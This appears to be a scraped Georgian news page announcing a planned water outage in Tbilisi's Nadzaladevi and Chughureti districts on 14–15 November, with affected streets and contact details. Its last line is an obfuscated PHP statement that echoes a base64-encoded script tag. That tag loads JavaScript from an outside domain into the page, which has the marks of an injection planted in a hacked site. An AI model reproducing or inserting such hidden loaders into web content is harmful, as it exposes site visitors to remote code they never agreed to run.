celsiusi
ავერსი საქკაბელი
14 ნოემბერს, „ჯორჯიან უოთერ ენდ ფაუერი” ნაძალადევის რაიონში, ხუდადოვის წყალმომარაგების რეზერვუარზე აუცილებელ ტექნიკურ სამუშაოებს ჩაატარებს.
 
„ჯორჯიან უოთერ ენდ ფაუერის” ინფორმაციით, გადაუდებელი ტექნიკური სამუშაოები 14 ნოემბერს, დღის 12:00 საათიდან დაიწყება, მთელი დღის განმავლობაში ინტენსიურ რეჟიმში გაგრძელდება და 15 ნოემბერს დილის 08:00 საათზე დასრულდება.
 
„აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც ხვალ, 14 ნოემბერს, 12:00 საათიდან 15 ნოემბრის დილის 08:00 საათამდე წყალმომარაგება შეეზღუდება:
 
ნაძალადევის რაიონში - უიარაღოს, ნოსტეს, კახიანის, ძმობის, წრომის, კელაპტრიშვილის, ასკურავას, სტურუას, კაჭრეთის, კონდოლის კოდალოს, ლოტკინის ხევის, ღუდუშაურის, ქართლელიშვილის, ურიდიას, ინანიშვილის და მიმდებარე ქუჩებს.
 
ჩუღურეთის რაიონში - ივერთუბნის დასახლებას, რეხის, მახათას აღმართის, სამურზაყანოს, სარკინეთის, ცხრა ძმის, აფხაზეთის, მარუაშვილის, სამშვილდის, ზაზიშვილის, ტყეკულტურის, არგვეთის, დავითაშვილის, ბაგრატიონის, მნათობის და მიმდებარე ქუჩებს.
 
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
 
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, „ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით http://www.gwp.ge“,- აღნიშნულია ინფორმაციაში.
379
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");